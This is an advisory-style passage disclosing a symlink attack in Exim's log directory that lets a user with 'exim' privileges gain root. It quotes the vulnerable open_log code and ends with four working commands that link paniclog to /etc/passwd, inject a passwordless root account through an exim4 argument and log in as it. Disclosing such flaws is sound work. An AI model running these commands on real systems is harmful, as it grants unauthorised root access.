========================================================================
CVE-2020-LFDIR -- Link attack in Exim's log directory
========================================================================

Exim operates as root in its log directory, which belongs to the "exim"
user:

An attacker who obtained the privileges of the "exim" user (by
exploiting CVE-2020-HSIZE or CVE-2020-OCORK for example) can exploit
this local vulnerability to obtain full root privileges. Indeed, the
following code opens a log file in append mode, as root (line 465):

  22 static uschar *log_names[] = { US"main", US"reject", US"panic", US"debug" };
 ...
 382 static void
 383 open_log(int *fd, int type, uschar *tag)
 384 {
 ...
 387 uschar buffer[LOG_NAME_SIZE];
 ...
 398 ok = string_format(buffer, sizeof(buffer), CS file_path, log_names[type]);
 ...
 465 *fd = Uopen(buffer,
 ...
 469                 O_APPEND|O_WRONLY, LOG_MODE);

The name of the log file in buffer is derived from file_path, which is
derived from log_file_path, a format string defined at compile time. On
Debian, log_file_path is "/var/log/exim4/%slog", and "%s" is converted
to "main", "reject", "panic", or "debug" at run time (line 398).

An attacker with the privileges of the "exim" user can create a symlink
(or a hardlink) in the log directory, append arbitrary contents to an
arbitrary file (to /etc/passwd, for example), and obtain full root
privileges:

cd /var/log/exim4
ln -s -f /etc/passwd paniclog
/usr/sbin/exim4 -Rr $'X\nfullroot::0:0::/:\nX['
su -l fullroot
